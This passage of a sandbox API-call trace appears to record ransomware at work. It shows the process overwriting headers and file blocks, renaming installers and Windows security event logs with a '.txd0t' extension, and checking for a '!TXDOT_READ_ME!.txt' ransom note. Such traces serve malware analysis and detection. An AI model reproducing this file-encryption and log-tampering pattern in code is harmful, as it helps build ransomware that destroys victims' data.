psz2="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended_x64.msi" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended_x64.msi") returned="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended_x64.msi" [0087.448] StrCatW (in: psz1="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended_x64.msi", psz2=".txd0t" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended_x64.msi.txd0t") returned="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended_x64.msi.txd0t" [0087.448] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended_x64.msi.txd0t") returned 0 [0087.448] SetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended_x64.msi", dwFileAttributes=0x80) returned 1 [0087.449] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended_x64.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x464 [0087.450] GetFileSizeEx (in: hFile=0x464, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=872448) returned 1 [0087.450] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.450] WriteFile (in: hFile=0x464, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0087.514] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xfff2ae00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.514] ReadFile (in: hFile=0x464, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0xd5000, lpNumberOfBytesRead=0x37ff440, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff440*=0xd5000, lpOverlapped=0x0) returned 1 [0087.537] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xfff2b000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.537] WriteFile (in: hFile=0x464, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0xd5000, lpNumberOfBytesWritten=0x37ff444, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff444*=0xd5000, lpOverlapped=0x0) returned 1 [0087.539] FlushFileBuffers (hFile=0x464) returned 1 [0087.667] GetProcessHeap () returned 0xe30000 [0087.667] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x108) returned 0xe9d750 [0087.667] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended_x64.msi" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended_x64.msi") returned="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended_x64.msi" [0087.667] PathFindFileNameW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended_x64.msi") returned="netfx_Extended_x64.msi" [0087.667] StrCpyW (in: psz1=0xe9d784, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0087.667] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\!TXDOT_READ_ME!.txt") returned 1 [0087.668] GetProcessHeap () returned 0xe30000 [0087.668] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0087.668] CloseHandle (hObject=0x464) returned 1 [0087.668] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended_x64.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x64.msi"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended_x64.msi.txd0t" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x64.msi.txd0t")) returned 1 [0087.669] SetEvent (hEvent=0x3f8) returned 1 [0087.669] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0087.681] StrCpyW (in: psz1=0x37ff490, psz2="\\\\?\\C:\\588bce7c90097ed212\\RGB9RAST_x64.msi" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\RGB9RAST_x64.msi") returned="\\\\?\\C:\\588bce7c90097ed212\\RGB9RAST_x64.msi" [0087.681] StrCatW (in: psz1="\\\\?\\C:\\588bce7c90097ed212\\RGB9RAST_x64.msi", psz2=".txd0t" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\RGB9RAST_x64.msi.txd0t") returned="\\\\?\\C:\\588bce7c90097ed212\\RGB9RAST_x64.msi.txd0t" [0087.681] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\RGB9RAST_x64.msi.txd0t") returned 0 [0087.681] SetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\RGB9RAST_x64.msi", dwFileAttributes=0x80) returned 1 [0087.681] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\RGB9RAST_x64.msi" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x464 [0087.681] GetFileSizeEx (in: hFile=0x464, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=184832) returned 1 [0087.681] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.681] WriteFile (in: hFile=0x464, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0087.684] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xfffd2c00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.684] ReadFile (in: hFile=0x464, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x2d200, lpNumberOfBytesRead=0x37ff450, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff450*=0x2d200, lpOverlapped=0x0) returned 1 [0087.693] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xfffd2e00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.693] WriteFile (in: hFile=0x464, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x2d200, lpNumberOfBytesWritten=0x37ff454, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff454*=0x2d200, lpOverlapped=0x0) returned 1 [0087.693] FlushFileBuffers (hFile=0x464) returned 1 [0087.737] GetProcessHeap () returned 0xe30000 [0087.738] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0xfc) returned 0xecfde0 [0087.738] StrCpyW (in: psz1=0xecfde0, psz2="\\\\?\\C:\\588bce7c90097ed212\\RGB9RAST_x64.msi" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\RGB9RAST_x64.msi") returned="\\\\?\\C:\\588bce7c90097ed212\\RGB9RAST_x64.msi" [0087.738] PathFindFileNameW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\RGB9RAST_x64.msi") returned="RGB9RAST_x64.msi" [0087.738] StrCpyW (in: psz1=0xecfe14, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0087.738] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\!TXDOT_READ_ME!.txt") returned 1 [0087.738] GetProcessHeap () returned 0xe30000 [0087.738] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xecfde0 | out: hHeap=0xe30000) returned 1 [0087.738] CloseHandle (hObject=0x464) returned 1 [0087.738] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\RGB9RAST_x64.msi" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x64.msi"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\RGB9RAST_x64.msi.txd0t" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x64.msi.txd0t")) returned 1 [0087.739] SetEvent (hEvent=0x3f8) returned 1 [0087.739] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0087.740] StrCpyW (in: psz1=0x37ff4a0, psz2="\\\\?\\C:\\588bce7c90097ed212\\Strings.xml" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\Strings.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\Strings.xml" [0087.740] StrCatW (in: psz1="\\\\?\\C:\\588bce7c90097ed212\\Strings.xml", psz2=".txd0t" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\Strings.xml.txd0t") returned="\\\\?\\C:\\588bce7c90097ed212\\Strings.xml.txd0t" [0087.740] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\Strings.xml.txd0t") returned 0 [0087.741] SetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Strings.xml", dwFileAttributes=0x80) returned 1 [0087.741] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Strings.xml" (normalized: "c:\\588bce7c90097ed212\\strings.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x464 [0087.741] GetFileSizeEx (in: hFile=0x464, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=14084) returned 1 [0087.741] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.741] WriteFile (in: hFile=0x464, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0087.743] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xffffc6fc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.743] ReadFile (in: hFile=0x464, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x3700, lpNumberOfBytesRead=0x37ff460, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff460*=0x3700, lpOverlapped=0x0) returned 1 [0087.747] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xffffc900, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.747] WriteFile (in: hFile=0x464, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x3700, lpNumberOfBytesWritten=0x37ff464, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff464*=0x3700, lpOverlapped=0x0) returned 1 [0087.747] FlushFileBuffers (hFile=0x464) returned 1 [0087.768] GetProcessHeap () returned 0xe30000 [0087.768] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0xf2) returned 0xe9d750 [0087.768] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\588bce7c90097ed212\\Strings.xml" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\Strings.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\Strings.xml" [0087.768] PathFindFileNameW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\Strings.xml") returned="Strings.xml" [0087.768] StrCpyW (in: psz1=0xe9d784, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0087.768] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\!TXDOT_READ_ME!.txt") returned 1 [0087.769] GetProcessHeap () returned 0xe30000 [0087.769] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0087.769] CloseHandle (hObject=0x464) returned 1 [0087.769] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\Strings.xml" (normalized: "c:\\588bce7c90097ed212\\strings.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\Strings.xml.txd0t" (normalized: "c:\\588bce7c90097ed212\\strings.xml.txd0t")) returned 1 [0087.769] SetEvent (hEvent=0x3f8) returned 1 [0087.769] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0087.771] StrCpyW (in: psz1=0x37ff4b0, psz2="\\\\?\\C:\\Logs\\Application.evtx" | out: psz1="\\\\?\\C:\\Logs\\Application.evtx") returned="\\\\?\\C:\\Logs\\Application.evtx" [0087.771] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Application.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Application.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Application.evtx.txd0t" [0087.771] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Application.evtx.txd0t") returned 0 [0087.771] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Application.evtx", dwFileAttributes=0x80) returned 1 [0087.777] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Application.evtx" (normalized: "c:\\logs\\application.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x464 [0087.777] GetFileSizeEx (in: hFile=0x464, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=69632) returned 1 [0087.778] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.778] WriteFile (in: hFile=0x464, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0087.779] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xfffeee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.779] ReadFile (in: hFile=0x464, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x37ff470, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff470*=0x11000, lpOverlapped=0x0) returned 1 [0087.781] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xfffef000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.781] WriteFile (in: hFile=0x464, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x37ff474, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff474*=0x11000, lpOverlapped=0x0) returned 1 [0087.781] FlushFileBuffers (hFile=0x464) returned 1 [0087.914] GetProcessHeap () returned 0xe30000 [0087.914] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0xe0) returned 0xe50800 [0087.914] StrCpyW (in: psz1=0xe50800, psz2="\\\\?\\C:\\Logs\\Application.evtx" | out: psz1="\\\\?\\C:\\Logs\\Application.evtx") returned="\\\\?\\C:\\Logs\\Application.evtx" [0087.914] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Application.evtx") returned="Application.evtx" [0087.914] StrCpyW (in: psz1=0xe50818, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0087.914] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0087.914] GetProcessHeap () returned 0xe30000 [0087.914] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe50800 | out: hHeap=0xe30000) returned 1 [0087.914] CloseHandle (hObject=0x464) returned 1 [0087.915] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Application.evtx" (normalized: "c:\\logs\\application.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Application.evtx.txd0t" (normalized: "c:\\logs\\application.evtx.txd0t")) returned 1 [0087.915] SetEvent (hEvent=0x3f8) returned 1 [0087.915] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0087.916] StrCpyW (in: psz1=0x37ff470, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx" [0087.916] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx.txd0t" [0087.916] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx.txd0t") returned 0 [0087.917] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx", dwFileAttributes=0x80) returned 1 [0087.917] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4msi and script.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x464 [0087.917] GetFileSizeEx (in: hFile=0x464, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=69632) returned 1 [0087.917] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.917] WriteFile (in: hFile=0x464, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0087.918] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xfffeee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.918] ReadFile (in: hFile=0x464, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x37ff430, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff430*=0x11000, lpOverlapped=0x0) returned 1 [0087.921] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xfffef000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.921] WriteFile (in: hFile=0x464, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x37ff434, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff434*=0x11000, lpOverlapped=0x0) returned 1 [0087.922] FlushFileBuffers (hFile=0x464) returned 1 [0088.110] GetProcessHeap () returned 0xe30000 [0088.110] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x120) returned 0xe9b648 [0088.110] StrCpyW (in: psz1=0xe9b648, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx" [0088.110] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx") returned="Microsoft-Windows-AppLocker%4MSI and Script.evtx" [0088.110] StrCpyW (in: psz1=0xe9b660, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0088.110] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0088.110] GetProcessHeap () returned 0xe30000 [0088.110] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b648 | out: hHeap=0xe30000) returned 1 [0088.110] CloseHandle (hObject=0x464) returned 1 [0088.110] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4msi and script.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx.txd0t" (normalized: "c:\\logs\\microsoft-windows-applocker%4msi and script.evtx.txd0t")) returned 1 [0088.111] SetEvent (hEvent=0x3f8) returned 1 [0088.111] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0088.119] StrCpyW (in: psz1=0x37ff470, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx" [0088.120] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx.txd0t" [0088.120] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx.txd0t") returned 0 [0088.120] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx", dwFileAttributes=0x80) returned 1 [0088.120] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-codeintegrity%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0088.120] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=69632) returned 1 [0088.120] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.121] WriteFile (in: hFile=0x474, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0088.121] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffeee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.122] ReadFile (in: hFile=0x474, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x37ff430, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff430*=0x11000, lpOverlapped=0x0) returned 1 [0088.125] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffef000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.125] WriteFile (in: hFile=0x474, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x37ff434, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff434*=0x11000, lpOverlapped=0x0) returned 1 [0088.126] FlushFileBuffers (hFile=0x474) returned 1 [0088.140] GetProcessHeap () returned 0xe30000 [0088.140] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x122) returned 0xe9b648 [0088.140] StrCpyW (in: psz1=0xe9b648, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx" [0088.140] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx") returned="Microsoft-Windows-CodeIntegrity%4Operational.evtx" [0088.141] StrCpyW (in: psz1=0xe9b660, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0088.141] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0088.141] GetProcessHeap () returned 0xe30000 [0088.141] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b648 | out: hHeap=0xe30000) returned 1 [0088.141] CloseHandle (hObject=0x474) returned 1 [0088.141] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-codeintegrity%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx.txd0t" (normalized: "c:\\logs\\microsoft-windows-codeintegrity%4operational.evtx.txd0t")) returned 1 [0088.141] SetEvent (hEvent=0x3f8) returned 1 [0088.141] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0088.146] StrCpyW (in: psz1=0x37ff470, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx" [0088.146] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx.txd0t" [0088.146] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx.txd0t") returned 0 [0088.146] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx", dwFileAttributes=0x80) returned 1 [0088.147] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0088.148] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=69632) returned 1 [0088.148] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.148] WriteFile (in: hFile=0x474, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0088.149] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffeee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.149] ReadFile (in: hFile=0x474, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x37ff430, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, 